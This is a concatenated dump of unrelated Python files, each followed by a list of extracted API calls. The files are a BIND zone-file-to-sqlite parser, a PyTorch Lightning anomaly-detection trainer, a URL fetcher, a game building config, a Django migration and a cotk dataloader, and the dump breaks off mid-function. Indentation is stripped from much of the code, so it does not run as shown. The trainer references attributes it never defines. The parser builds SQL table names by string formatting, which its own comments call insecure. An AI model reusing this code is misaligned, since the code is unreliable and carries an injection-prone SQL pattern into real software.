for i in range(len(self.zone)):
            i -= self.subt # to compensate for the mapping collapse
try:
self.zone[i]
except IndexError:
break
if "(" in self.zone[i]:
self.paranthese += 1
self.use_index = i
continue
if ")" in self.zone[i]:
self.paranthese -= 1
self.move(self.use_index)
self.subt += 1
continue
if self.paranthese:
self.move(self.use_index)
self.subt += 1
def rmCompleteParanthese(self):
"""removes every paranthes from zone by merging"""
self.count = 0
while [i for i in self.zone if "(" in i or ")" in i]:
self.count += 1
self.rmParanthese()
self.mergeParanthese()
if self.count > 100:
self.error("Paranthese Syntax: Please avoid using Paranthese in Paranthese or more then more paranthese per line")
self.rmParanthese()
del self.count
def split(self):
"""splits zone to fields"""
self.zone = [i.split() for i in self.zone]
def handle(self, primKey, Name, TTL, Class, Type, Value):
"""Handler for parser return. Here you get all data -> api""" # later mySQL?
self.Table.append([primKey, Name, TTL, Class, Type, Value])
def isType(self, object):
"""returns true if object is a entry type like NS, eg."""
return True if object in RRsTYPES else False
def isClass(self, object):
"""returns True if obeject is a class like IN, eg."""
return True if object in CLASSES else False
def isTTL(self, liste):
"""returns True if given list from zone is TTL record"""
return True if liste[0] == '$TTL' and len(liste) < 3 else False
def isTTLobj(self, object):
"""Returns if given object is ttl. Warning: it's just probatly correct"""
return True if object[:-1].isdigit() else False # -1 because of 23h for eg.
def cleanUp(self):
"""removes empty strings and lists from zone"""
self.zone = [i for i in self.zone if i and i[0] != '']
def getType(self, liste):
"""returns type of given entry"""
for i in liste:
if self.isType(i):
return i
def getClass(self, liste):
"""returns class of given entry"""
for i in liste:
if self.isClass(i):
return i
def parse(self):
"""Main Parser"""
self.primKey = 0
for entry in self.zone:
if self.isTTL(entry):
self.default_TTL = entry[1] # default ttl
continue
self.type = self.getType(entry)
self.klasse = self.getClass(entry)
if self.type:
self.default_type = self.type
else:
try:
self.type = self.default_type
except NameError:
self.error("Please check your zonfile. Error at {0}.\nType not found".format(" ".join(entry)))
if self.klasse:
self.default_klasse = self.klasse
else:
try:
self.klasse = self.default_klasse
except NameError:
self.error("Please check your zonfile. Error at {0}.\nClass not found".format(" ".join(entry)))
self.typeindex = entry.index(self.type)
self.value = " ".join(entry[self.typeindex+1:])
entry = entry[:self.typeindex] # left: probatly name, probatly ttl, probatly class
self.over = len(entry)
if self.over == 3:
if entry.pop(2) != self.klasse:
self.error("There occured a fatal logical error at {0}.\nPlease contact support for more information".format(" ".join(entry)))
self.over = len(entry)
if self.over == 2: # Possible: class, ttl, name but: entry[1] = {TTL//class} -> !name
if entry[1] == self.klasse:
entry.pop()
else:
self.ttl = entry.pop() # Has to be ttl
self.over = len(entry)
if self.over == 1: # possible: name, class, ttl
if entry[0] == self.klasse:
entry.pop()
elif self.isTTLobj(entry[0]):
print("warning at {0}. I'll handle it as TTL!".format(" | ".join([str(y) for y in (self.primKey, self.name, entry[0], self.klasse, self.type, self.value)]))) # carefull!!! 123456d as dom -> undifined error
self.ttl = entry.pop()
else:
self.name = entry[0]
try:
self.ttl = self.default_TTL
except AttributeError:
self.error("Please check your zonfile. TTL not found")
self.handle(self.primKey, self.name,self.ttl, self.klasse, self.type, self.value)
del self.value
self.primKey += 1
class Parser():
"""Paser - Friendly User API"""
def __init__(self, file):
import os.path as path
self.file = file
self.parser = _Parser(file)
self.table = self.parser.Table
self.TTL = self.parser.default_TTL
self.zonename = path.basename(self.file)
del self.parser # RAM clean
def getValues(self):
"""returns set of all available Values in the Zone"""
return set([i[5] for i in self.table])
def getTypes(self):
"""returns set of all available Types in the Zone"""
return set([i[4] for i in self.table])
def getClasses(self):
"""returns set of all available classes in the Zone"""
return set([i[3] for i in self.table])
def getTTLs(self):
"""returns set of all available TTLs in the Zone (Normaly one)"""
return set([i[2] for i in self.table])
def getDomains(self):
"""returns set of all available Domains in the Zone"""
return set([i[1] for i in self.table])
def getIDs(self):
"""returns set of all available ID's // prim. keys of internal table"""
return set([i[0] for i in self.table])
def getDefaultTTL(self):
"""Returns last used TTL"""
return self.TTL
def getRecords(self, ID = False, Domain = False, TTL = False, Class = False, Type = False, Value = False):
"""MetaGer - returns list of matching rows"""
self.result = list()
for i in self.table:
if ID and ID != i[0]: continue
if not isinstance(ID, bool) and ID == 0 and i[0] != 0: continue
if Domain and Domain != i[1]: continue
if TTL and TTL != i[2]: continue
if Class and Class != i[3]: continue
if Type and Type != i[4]: continue
if Value and Value != i[5]: continue
self.result.append(i)
return self.result
def getValue(self, Value):
"""Returns entrys matching the given value"""
return [i for i in self.table if i[5] == Value]
def getType(self, Type):
"""Returns entrys matching the given type"""
return [i for i in self.table if i[4] == Type]
def getClass(self, Class):
"""Returns entrys matching the given class"""
return [i for i in self.table if i[3] == Class]
def getTTL(self, TTL):
"""Returns entrys matching the given TTL"""
return [i for i in self.table if i[2] == str(TTL)]
def getName(self, Name):
"""Returns entrys matching the given name"""
return [i for i in self.table if i[1] == Name]
def getID(self, ID):
"""Returns entrys matching the given ID"""
return [i for i in self.table if i[0] == ID]
def getMaster(self):
"""Returns Master-field of SOA record"""
return self.getType("SOA")[0][5].split()[0]
def getZoneContact(self):
"""Returns contact-field of SOA record"""
return self.getType("SOA")[0][5].split()[1]
def getSerial(self):
"""Returns serial-field of SOA record"""
return self.getType("SOA")[0][5].split()[2]
def getRefreshTime(self):
"""Returns refersh time - field of SOA record"""
return self.getType("SOA")[0][5].split()[3]
def getRetryTime(self):
"""Returns retry time - field of SOA record"""
return self.getType("SOA")[0][5].split()[4]
def getExpireTime(self):
"""Returns expire time - field of SOA record"""
return self.getType("SOA")[0][5].split()[5]
def getNegativeCache(self):
"""Returns negative cache time - field of SOA record"""
return self.getType("SOA")[0][5].split()[6]
def getIPv4(self):
"""Return current IPv4 addr of origin"""
return self.getRecords(Domain = "@", Class = "IN", Type="A")[0][5]
def getIPv6(self):
"""Return current IPv6 addr of origin"""
return self.getRecords(Domain = "@", Class = "IN", Type="AAAA")[0][5]
def mkSerial(self, check = True):
"""Sets timestamp allone. If check, no serial > 99 are supported"""
self.old_time = self.getSerial()[:8]
self.new_time = strftime("%Y%m%d")
if self.old_time != self.new_time:
self.serial = "01"
else:
self.serial = str(int(self.getSerial()[8:]) + 1)
        if check: assert int(self.serial) < 100, """More than 99 changes aren't supported per day."""
if len(self.serial) < 2:
self.serial = "0{0}".format(self.serial)
return "{0}{1}".format(self.new_time, self.serial)
def refresh(self):
"""Reloads complete zone"""
self.__init__(self.file)
def convert2sqlite(self, file, table = None, commit = True):
"""Writes results to sql database. If table not given, zonename is used
        if commit = [True] changes are automatically committed to the db,
else connection object is returned"""
import sqlite3 as sql
if table: self.tableName = table
else: self.tableName = self.zonename
self.connection = sql.connect(file)
self.cursor = self.connection.cursor()
self.cursor.execute("drop table if exists '{0}'".format(self.tableName)) # insecure !!! Problems: "db.mydomain.local".count(".") != 0 -> mySQL Syntax error
self.cursor.execute("""CREATE TABLE '{0}'
(id INT,
domain VARCHAR({1}) NOT NULL,
ttl INT,
class VARCHAR({2}) NOT NULL,
type VARCHAR({3}) NOT NULL,
value TEXT NOT NULL)""".format(self.tableName, DOMAIN_MAX_LENGHT,
max([len(i) for i in RRsTYPES]),
max([len(i) for i in CLASSES]))) # also insecure
self.cursor.executemany('INSERT INTO "{0}" VALUES (?,?,?,?,?,?)'
.format(self.tableName), self.table)
if commit:
self.connection.commit()
self.cursor.close()
else:
return self.connection
if __name__ == "__main__":
from sys import argv
from os import path as path
if len(argv) == 1:
print("""
Bind Zonefile Parser
====================
Version: {0}
Converts zone file to sqlite database
Stand Alone Usage:
./parser.py zonefile [database=zone.sqlite]\n""".format(VERSION))
elif len(argv) == 2:
assert path.isfile(argv[1]), "Zonefile {0} not found".format(argv[1])
parser = Parser(argv[1])
parser.convert2sqlite("zone.sqlite")
print("wrote database to zone.sqlite")
elif len(argv) == 3:
assert path.isfile(argv[1]), "Zonefile {0} not found".format(argv[1])
parser = Parser(argv[1])
parser.convert2sqlite(argv[2])
print("wrote database to {0}".format(argv[2]))
else:
print("To many arguments")
| [
"os.path.isfile",
"sqlite3.connect",
"time.strftime",
"os.path.basename"
] | [((9084, 9108), 'os.path.basename', 'path.basename', (['self.file'], {}), '(self.file)\n', (9097, 9108), True, 'import os.path as path\n'), ((12963, 12981), 'time.strftime', 'strftime', (['"""%Y%m%d"""'], {}), "('%Y%m%d')\n", (12971, 12981), False, 'from time import strftime\n'), ((13868, 13885), 'sqlite3.connect', 'sql.connect', (['file'], {}), '(file)\n', (13879, 13885), True, 'import sqlite3 as sql\n'), ((15096, 15116), 'os.path.isfile', 'path.isfile', (['argv[1]'], {}), '(argv[1])\n', (15107, 15116), True, 'import os.path as path\n'), ((15324, 15344), 'os.path.isfile', 'path.isfile', (['argv[1]'], {}), '(argv[1])\n', (15335, 15344), True, 'import os.path as path\n')] |
import pytorch_lightning as pl
import torch
import typing as th
import torchmetrics
from .. import utils as ebad_utils
class AnoTrainer(pl.LightningModule):
def __init__(
self,
model_cls: th.Union[str, torch.nn.Module],
input_shape: th.Union[th.Tuple[int], th.List[int]],
input_clamp: th.Optional[th.Union[float, tuple]] = (-1., 1.),
model_params: th.Optional[dict] = None,
**kwargs,
):
super().__init__()
        self.save_hyperparameters()  # assumed intent: populate self.hparams from the constructor arguments, since self.hparams is read below
        self.model = ebad_utils.get_value(self.hparams.model_cls)(**(self.hparams.model_params or dict()))
# metrics
self.val_auroc = torchmetrics.AUROC(num_classes=2, pos_label=1)
self.test_auroc = torchmetrics.AUROC(num_classes=2, pos_label=1)
def forward(self, x):
z = self.model(x)
return z
def training_step(self, batch, batch_idx: th.Optional[int] = None, optimizer_idx: th.Optional[int] = None):
inputs, targets = batch
if self.noise_eps:
# add minimal noise to the original inputs to prevent the model from focusing on purely "clean" inputs
inputs.add_(torch.randn_like(inputs) * self.noise_eps)
if self.hparams.input_clamp:
inputs.clamp_(
*(self.hparams.input_clamp if isinstance(self.hparams.input_clamp, tuple) else (
-self.hparams.input_clamp, self.hparams.input_clamp)))
# Obtain samples
samples = self.sampler.sample(sample_size=inputs.shape[0], update_buffer=True, device=inputs.device)
# Predict energy score for all images
all_inputs = torch.cat([inputs, samples], dim=0)
inputs_out, samples_out = self.model(all_inputs).chunk(2, dim=0)
# Calculate losses
loss = 0.
if self.regularizer_alpha:
reg_loss = (inputs_out ** 2 + samples_out ** 2).mean()
loss += self.regularizer_alpha * reg_loss
self.log(f'loss/regularization/train', reg_loss)
        cdiv_loss = samples_out.mean() - inputs_out.mean()  # contrastive divergence: mean score of samples minus mean score of real inputs
self.log(f'loss/contrastive_divergence/train', cdiv_loss)
loss += cdiv_loss
self.log(f'loss/train', loss)
self.log(f'metrics/inputs/train', inputs_out.mean())
self.log(f'metrics/samples/train', samples_out.mean())
return loss
def validation_step(self, batch, batch_idx: th.Optional[int] = None, optimizer_idx: th.Optional[int] = None):
# calculate the contrastive divergence between purely random images and unseen examples
inputs, targets = batch
self.log(f'metrics/random/val', self.model(torch.rand_like(inputs) * 2 - 1).mean())
scores = self.model(inputs)
self.val_auroc(
preds=-scores, # auroc expects predictions to have higher values for the positive class
            target=targets
)
self.log('metrics/auroc/val', self.val_auroc, on_step=True, on_epoch=True)
| [
"torchmetrics.AUROC",
"torch.rand_like",
"torch.cat",
"torch.randn_like"
] | [((646, 692), 'torchmetrics.AUROC', 'torchmetrics.AUROC', ([], {'num_classes': '(2)', 'pos_label': '(1)'}), '(num_classes=2, pos_label=1)\n', (664, 692), False, 'import torchmetrics\n'), ((719, 765), 'torchmetrics.AUROC', 'torchmetrics.AUROC', ([], {'num_classes': '(2)', 'pos_label': '(1)'}), '(num_classes=2, pos_label=1)\n', (737, 765), False, 'import torchmetrics\n'), ((1645, 1680), 'torch.cat', 'torch.cat', (['[inputs, samples]'], {'dim': '(0)'}), '([inputs, samples], dim=0)\n', (1654, 1680), False, 'import torch\n'), ((1147, 1171), 'torch.randn_like', 'torch.randn_like', (['inputs'], {}), '(inputs)\n', (1163, 1171), False, 'import torch\n'), ((2649, 2672), 'torch.rand_like', 'torch.rand_like', (['inputs'], {}), '(inputs)\n', (2664, 2672), False, 'import torch\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""
Given an URL in string, make a request, fetch its content,
and parse using BeautifulSoup.
"""
import time
import requests
import logging
import urllib.parse as urlparse
from bs4 import BeautifulSoup
class URLContentFetcher(object):
def __init__(self, url, timeout=3, parser='html5lib', proxies=None):
self.url = url
self.soup = None
self.success = None
self.message = None
self.timeout = timeout
self.parser = parser
self.proxies = proxies
self.running_time = 0
def read_and_soup(self):
"""
Fetch content from a url
"""
user_agent_list = [
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/35.0.1916.47 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/44.0.2403.157 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/57.0.2987.133 Safari/537.36',
]
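        # pick a user agent deterministically from the URL's host and path, so the same URL keeps the same UA within a run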
parsed = urlparse.urlparse(self.url)
headers = {
"User-Agent": user_agent_list[
hash(parsed.netloc + parsed.path) % len(user_agent_list)],
"X-Requested-With": "XMLHttpRequest",
"Accept-Encoding": "gzip",
}
try:
start_time = time.time()
r = requests.get(
self.url,
headers=headers,
timeout=self.timeout,
stream=True,
proxies=self.proxies
)
url_data = r.content.decode('utf-8', 'ignore')
soup = BeautifulSoup(url_data, self.parser)
end_time = time.time()
self.running_time = end_time - start_time
self.soup = soup
self.success = True
except Exception as e:
logging.error(repr(e) + ", url: {0}".format(self.url))
self.success = False
self.message = "Modified URL error: " + str(e)
def get_body(self):
"""
Get the body of a HTML content
"""
if self.soup is None:
self.read_and_soup()
if not self.success or self.soup.body is None:
return ""
return self.soup.body.getText()
def get_title(self):
"""
Get the title from a HTML content
"""
if self.soup is None:
self.read_and_soup()
if not self.success or self.soup.title is None:
return ""
return self.soup.title
| [
"requests.get",
"bs4.BeautifulSoup",
"urllib.parse.urlparse",
"time.time"
] | [((1719, 1746), 'urllib.parse.urlparse', 'urlparse.urlparse', (['self.url'], {}), '(self.url)\n', (1736, 1746), True, 'import urllib.parse as urlparse\n'), ((2022, 2033), 'time.time', 'time.time', ([], {}), '()\n', (2031, 2033), False, 'import time\n'), ((2050, 2150), 'requests.get', 'requests.get', (['self.url'], {'headers': 'headers', 'timeout': 'self.timeout', 'stream': '(True)', 'proxies': 'self.proxies'}), '(self.url, headers=headers, timeout=self.timeout, stream=True,\n proxies=self.proxies)\n', (2062, 2150), False, 'import requests\n'), ((2319, 2355), 'bs4.BeautifulSoup', 'BeautifulSoup', (['url_data', 'self.parser'], {}), '(url_data, self.parser)\n', (2332, 2355), False, 'from bs4 import BeautifulSoup\n'), ((2379, 2390), 'time.time', 'time.time', ([], {}), '()\n', (2388, 2390), False, 'import time\n')] |
from utils.models import base, product
#
# Bronze Age
#
BronzePottery = base.ManufactureBuilding(
name="🏺🏠 Гончарня",
products=[product.dish, product.jug, product.amphora],
create_price=[340, 490],
create_time_sec=1800,
manpower=108
)
BronzePlantation = base.ManufactureBuilding(
name="🍇🏠 Плантация",
products=[product.grape, product.pear, product.melon],
create_price=[340, 490],
create_time_sec=1800,
manpower=108
)
# Iron Age
IronForger = base.ManufactureBuilding(
name="🥩🏠 Мясник",
products=[product.meat, product.chicken],
create_price=[1500, 2400],
create_time_sec=5400,
manpower=230
)
IronButcher = base.ManufactureBuilding(
name="🧵🏠 Портной",
products=[product.threads, product.socks],
create_price=[1500, 2400],
create_time_sec=5400,
manpower=230
)
| [
"utils.models.base.ManufactureBuilding"
] | [((74, 243), 'utils.models.base.ManufactureBuilding', 'base.ManufactureBuilding', ([], {'name': '"""🏺🏠 Гончарня"""', 'products': '[product.dish, product.jug, product.amphora]', 'create_price': '[340, 490]', 'create_time_sec': '(1800)', 'manpower': '(108)'}), "(name='🏺🏠 Гончарня', products=[product.dish,\n product.jug, product.amphora], create_price=[340, 490], create_time_sec\n =1800, manpower=108)\n", (98, 243), False, 'from utils.models import base, product\n'), ((277, 447), 'utils.models.base.ManufactureBuilding', 'base.ManufactureBuilding', ([], {'name': '"""🍇🏠 Плантация"""', 'products': '[product.grape, product.pear, product.melon]', 'create_price': '[340, 490]', 'create_time_sec': '(1800)', 'manpower': '(108)'}), "(name='🍇🏠 Плантация', products=[product.grape,\n product.pear, product.melon], create_price=[340, 490], create_time_sec=\n 1800, manpower=108)\n", (301, 447), False, 'from utils.models import base, product\n'), ((487, 639), 'utils.models.base.ManufactureBuilding', 'base.ManufactureBuilding', ([], {'name': '"""🥩🏠 Мясник"""', 'products': '[product.meat, product.chicken]', 'create_price': '[1500, 2400]', 'create_time_sec': '(5400)', 'manpower': '(230)'}), "(name='🥩🏠 Мясник', products=[product.meat, product.\n chicken], create_price=[1500, 2400], create_time_sec=5400, manpower=230)\n", (511, 639), False, 'from utils.models import base, product\n'), ((673, 830), 'utils.models.base.ManufactureBuilding', 'base.ManufactureBuilding', ([], {'name': '"""🧵🏠 Портной"""', 'products': '[product.threads, product.socks]', 'create_price': '[1500, 2400]', 'create_time_sec': '(5400)', 'manpower': '(230)'}), "(name='🧵🏠 Портной', products=[product.threads,\n product.socks], create_price=[1500, 2400], create_time_sec=5400,\n manpower=230)\n", (697, 830), False, 'from utils.models import base, product\n')] |
# Generated by Django 2.1.3 on 2018-11-09 00:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('workertasks', '0002_auto_20181109_0046'),
]
operations = [
migrations.AlterField(
model_name='assignment',
name='begin_exp',
field=models.DateTimeField(null=True),
),
migrations.AlterField(
model_name='assignment',
name='begin_hit',
field=models.DateTimeField(null=True),
),
migrations.AlterField(
model_name='assignment',
name='end_hit',
field=models.DateTimeField(null=True),
),
migrations.AlterField(
model_name='worker',
name='qualification',
field=models.IntegerField(default=0),
),
]
| [
"django.db.models.DateTimeField",
"django.db.models.IntegerField"
] | [((347, 378), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)'}), '(null=True)\n', (367, 378), False, 'from django.db import migrations, models\n'), ((507, 538), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)'}), '(null=True)\n', (527, 538), False, 'from django.db import migrations, models\n'), ((665, 696), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)'}), '(null=True)\n', (685, 696), False, 'from django.db import migrations, models\n'), ((825, 855), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (844, 855), False, 'from django.db import migrations, models\n')] |
import cotk
from cotk._utils.file_utils import get_resource_file_path
from cotk.dataloader.dataloader import *
from collections import Counter
import numpy as np
from itertools import chain
class Score(DataField):
def get_next(self, dataset):
r"""read text and returns the next label(integer). Note that it may raise StopIteration.
Args:{DataField.GET_NEXT_ARG}
Examples:
>>> dataset = iter(["1\n", "0\n"])
>>> field = Label()
>>> field.get_next(dataset)
1
>>> field.get_next(dataset)
0
"""
score = next(dataset)
return float(score.strip())
def _map_fun(self, element, convert_ids_to_tokens=None):
"""
Returns the element itself.
Args:
element: An element of a dataset.
convert_ids_to_tokens: It's useless. This argument exists, just to keep the signature the same as that of super class.
"""
return element
class TranslationWithScore(cotk.dataloader.SingleTurnDialog):
@cotk._utils.hooks.hook_dataloader
def __init__(self, file_id, min_vocab_times, \
max_sent_length, invalid_vocab_times, \
tokenizer, remains_capital
):
super().__init__(file_id, min_vocab_times, \
max_sent_length, invalid_vocab_times, \
tokenizer, remains_capital)
def _load_data(self):
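		# only the training split carries the extra per-pair score column; dev and test have just post/resp sentences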
data_fields = {
'train': [['post', 'Sentence'], ['resp', 'Sentence'], ['score', Score]],
'dev': [['post', 'Sentence'], ['resp', 'Sentence']],
'test': [['post', 'Sentence'], ['resp', 'Sentence']],
}
return self._general_load_data(self._file_path, data_fields, \
self._min_vocab_times, self._max_sent_length, None, self._invalid_vocab_times)
def _general_load_data(self, file_path, data_fields, min_vocab_times, max_sent_length, max_turn_length,
invalid_vocab_times):
r'''This function implements a general loading process.
Arguments:
file_path (str): A string indicating the path of dataset.
data_fields (dict, list, tuple): If it's a list(tuple), it must be a list of (key, field) pairs.
Field must be a DataField instance,
or a subclass of DataField(in this case, its instance will be used, assuming its constructor accepts no arguments),
or a string(in this case, the instance of the class, whose __name__ is field, will be used).
For example, data_fields=[['post', 'Sentence'], ['label', Label]] means that,
in the raw file, the first line is a sentence and the second line is a label. They are saved in a dict.
dataset = {'post': [line1, line3, line5, ...], 'label': [line2, line4, line6, ...]}
data_fields=[['key1', 'Session'], ['key2', Label()]], means that, in the raw file, the first *several lines*
is a session, *followed by an empty line*, and the next line is a label.
dataset = {'key1': [session1, session2, ...], 'key2': [label1, label2, ...]}
If it's a dict, different datasets may have different formats.(If `data_fields` is a list or a tuple, different datasets have the same format).
Its keys are the same as `self.key_name` that indicate the datasets, and the values are lists as mentioned above.
For example, data_fields = {'train': [['sess', 'Session'], ['label', 'Label']], 'test': [['sess', 'session']]},
means that the train set contains sessions and labels, but the test set only contains sessions.
			min_vocab_times (int): A cut-off threshold of valid tokens. All tokens that appear
				not less than ``min_vocab_times`` times in the **training set** will be marked as valid words.
			max_sent_length (int): All sentences longer than ``max_sent_length`` will be shortened
				to their first ``max_sent_length`` tokens.
			max_turn_length (int): All sessions whose turn length is longer than ``max_turn_length`` will be shortened to
				their first ``max_turn_length`` sentences. If the dataset doesn't contain sessions, this parameter is ignored.
			invalid_vocab_times (int): A cut-off threshold of invalid tokens. All tokens that appear
				not less than ``invalid_vocab_times`` times in the **whole dataset** (except valid words) will be
				marked as invalid words. Otherwise, they are unknown words, which are ignored both by the
				model and the metrics.
Returns:
(tuple): containing:
* **all_vocab_list** (list): vocabulary list of the datasets,
including valid and invalid vocabs.
* **valid_vocab_len** (int): the number of valid vocab.
``vocab_list[:valid_vocab_len]`` will be regarded as valid vocabs,
while ``vocab_list[valid_vocab_len:]`` regarded as invalid vocabs.
* **data** (dict): a dict contains data.
* **data_size** (dict): a dict contains size of each item in data.
'''
def get_fields(fields):
assert isinstance(fields, list) or isinstance(fields, tuple)
return [(data_key, DataField.get_field(field)) for data_key, field in fields]
if isinstance(data_fields, dict):
no_field_keys = [key for key in self.key_name if key not in data_fields]
if no_field_keys:
				raise ValueError('There are no data fields for dataset (%s)' % ', '.join(no_field_keys))
try:
data_fields = {key: get_fields(data_fields[key]) for key in self.key_name}
except AssertionError:
				raise TypeError('If `data_fields` is a dict, its value must be a list (or tuple) of lists (or tuples).')
elif isinstance(data_fields, list) or isinstance(data_fields, tuple):
data_fields = get_fields(data_fields)
data_fields = {key: data_fields for key in self.key_name}
else:
raise TypeError('`data_fields` must be a dict, or a list, or a tuple.')
# now data_fields is a dict. Keys are the same as self.key_name('train', 'test', 'dev', etc.). Each value is
# a list(tuple) of lists(tuples), which means (data_key(str), data_field(DataField)) pairs.
# For example,
# data_fields == {'train': [['sent', Sentence()], ['label', Label()]],
# 'test': [['sent', Sentence()], ['label', Label()]]}.
# Note, different dataset may have different fields.
special_tokens = set(self.ext_vocab)
origin_data = {}
for key in self.key_name:
origin_data[key] = {data_key: [] for data_key, _ in data_fields[key]}
with open("%s/%s.txt" % (file_path, key), encoding='utf-8') as f_file:
while True:
try:
for data_key, field in data_fields[key]:
element = field.convert_to_tokens(field.get_next(f_file), self.tokenize)
for token in field.iter_tokens(element):
if token in special_tokens:
raise RuntimeError(
'The dataset contains special token "%s". This is not allowed.' % token)
origin_data[key][data_key].append(element)
except StopIteration:
break
def chain_allvocab(dic, fields):
vocabs = []
for data_key, field in fields:
for element in dic[data_key]:
vocabs.extend(field.iter_tokens(element))
return vocabs
raw_vocab_list = chain_allvocab(origin_data['train'], data_fields['train'])
# Important: Sort the words preventing the index changes between
# different runs
vocab = sorted(Counter(raw_vocab_list).most_common(), \
key=lambda pair: (-pair[1], pair[0]))
left_vocab = [x[0] for x in vocab if x[1] >= min_vocab_times]
vocab_list = self.ext_vocab + list(left_vocab)
valid_vocab_len = len(vocab_list)
valid_vocab_set = set(vocab_list)
for key in self.key_name:
if key == 'train':
continue
raw_vocab_list.extend(chain_allvocab(origin_data[key], data_fields[key]))
vocab = sorted(Counter(raw_vocab_list).most_common(), \
key=lambda pair: (-pair[1], pair[0]))
left_vocab = [x[0] for x in vocab if x[1] >= invalid_vocab_times and x[0] not in valid_vocab_set]
vocab_list.extend(left_vocab)
print("valid vocab list length = %d" % valid_vocab_len)
print("vocab list length = %d" % len(vocab_list))
word2id = {w: i for i, w in enumerate(vocab_list)}
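		# Convert every field to ids and cut over-long sentences/sessions, split by split.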
data = {}
data_size = {}
for key in self.key_name:
data[key] = {}
for data_key, field in data_fields[key]:
origin_data[key][data_key] = [field.convert_to_ids(element, word2id, self) for element in
origin_data[key][data_key]]
data[key][data_key] = [
field.cut(element, max_sent_length=max_sent_length, max_turn_length=max_turn_length) for element in
origin_data[key][data_key]]
if key not in data_size:
data_size[key] = len(data[key][data_key])
elif data_size[key] != len(data[key][data_key]):
raise RuntimeError(
"The data of input %s.txt contains different numbers of fields" % key)
vocab = chain_allvocab(origin_data[key], data_fields[key])
vocab_num = len(vocab)
oov_num = sum([word not in word2id for word in vocab])
invalid_num = sum([word not in valid_vocab_set for word in vocab]) - oov_num
sent_length = []
for data_key, field in data_fields[key]:
sent_length.extend(
[len(sent) for element in origin_data[key][data_key] for sent in field.iter_sentence(element)])
cut_word_num = np.sum(np.maximum(np.array(sent_length) - max_sent_length, 0))
session_keys = [data_key for data_key, field in data_fields[key] if field.__class__ == Session]
if session_keys:
turn_length = list(
map(len, chain.from_iterable((origin_data[key][sess_key] for sess_key in session_keys))))
max_turn_length_before_cut = max(turn_length)
sent_num = sum(turn_length)
cut_sentence_rate = np.sum(np.maximum(np.array(turn_length) - max_turn_length, 0)) / sent_num
else:
max_turn_length_before_cut = 1
cut_sentence_rate = 0
print(("%s set. invalid rate: %f, unknown rate: %f, max sentence length before cut: %d, " + \
"cut word rate: %f\n\tmax turn length before cut: %d, cut sentence rate: %f") % \
(key, invalid_num / vocab_num, oov_num / vocab_num, max(sent_length), \
cut_word_num / vocab_num, max_turn_length_before_cut, cut_sentence_rate))
# calculate hash value
hash_value = DataloaderHash(ignore_tokens=(self.go_id, self.eos_id, self.pad_id),
unk_id=self.unk_id).hash_datasets(data, data_fields, vocab_list[len(
self.ext_vocab):valid_vocab_len])
self.__hash_value = hash_value
return vocab_list, valid_vocab_len, data, data_size
def get_batch(self, key, indexes):
'''{LanguageProcessingBase.GET_BATCH_DOC_WITHOUT_RETURNS}
Returns:
(dict): A dict at least contains:
* **post_length** (:class:`numpy.ndarray`): A 1-d array, the length of post in each batch.
Size: ``[batch_size]``
* **post** (:class:`numpy.ndarray`): A 2-d padded array containing words of id form in posts.
Only provide valid words. ``unk_id`` will be used if a word is not valid.
Size: ``[batch_size, max(sent_length)]``
* **post_allvocabs** (:class:`numpy.ndarray`): A 2-d padded array containing words of id
form in posts. Provide both valid and invalid vocabs.
Size: ``[batch_size, max(sent_length)]``
* **resp_length** (:class:`numpy.ndarray`): A 1-d array, the length of response in each batch.
Size: ``[batch_size]``
* **resp** (:class:`numpy.ndarray`): A 2-d padded array containing words of id form
in responses. Only provide valid vocabs. ``unk_id`` will be used if a word is not valid.
Size: ``[batch_size, max(sent_length)]``
* **resp_allvocabs** (:class:`numpy.ndarray`):
A 2-d padded array containing words of id form in responses.
Provide both valid and invalid vocabs.
Size: ``[batch_size, max(sent_length)]``
Examples:
>>> # all_vocab_list = ["<pad>", "<unk>", "<go>", "<eos>", "how", "are", "you",
>>> # "hello", "i", "am", "fine"]
>>> # vocab_size = 9
>>> # vocab_list = ["<pad>", "<unk>", "<go>", "<eos>", "how", "are", "you", "hello", "i"]
>>> dataloader.get_batch('train', [0, 1])
{
"post_allvocabs": numpy.array([
[2, 5, 6, 10, 3], # first post: <go> are you fine <eos>
[2, 7, 3, 0, 0], # second post: <go> hello <eos> <pad> <pad>
]),
"post": numpy.array([
[2, 5, 6, 1, 3], # first post: <go> are you <unk> <eos>
[2, 7, 3, 0, 0], # second post: <go> hello <eos> <pad> <pad>
]),
"resp_allvocabs": numpy.array([
[2, 8, 9, 10, 3], # first response: <go> i am fine <eos>
[2, 7, 3, 0, 0], # second response: <go> hello <eos> <pad> <pad>
]),
"resp": numpy.array([
[2, 8, 1, 1, 3], # first response: <go> i <unk> <unk> <eos>
[2, 7, 3, 0, 0], # second response: <go> hello <eos> <pad> <pad>
]),
"post_length": numpy.array([5, 3]), # length of posts
"resp_length": numpy.array([5, 3]), # length of responses
}
'''
if key not in self.key_name:
raise ValueError("No set named %s." % key)
res = {}
batch_size = len(indexes)
res["post_length"] = np.array(list(map(lambda i: len(self.data[key]['post'][i]), indexes)), dtype=int)
res["resp_length"] = np.array(list(map(lambda i: len(self.data[key]['resp'][i]), indexes)), dtype=int)
res_post = res["post"] = np.zeros((batch_size, np.max(res["post_length"])), dtype=int)
res_resp = res["resp"] = np.zeros((batch_size, np.max(res["resp_length"])), dtype=int)
for i, j in enumerate(indexes):
post = self.data[key]['post'][j]
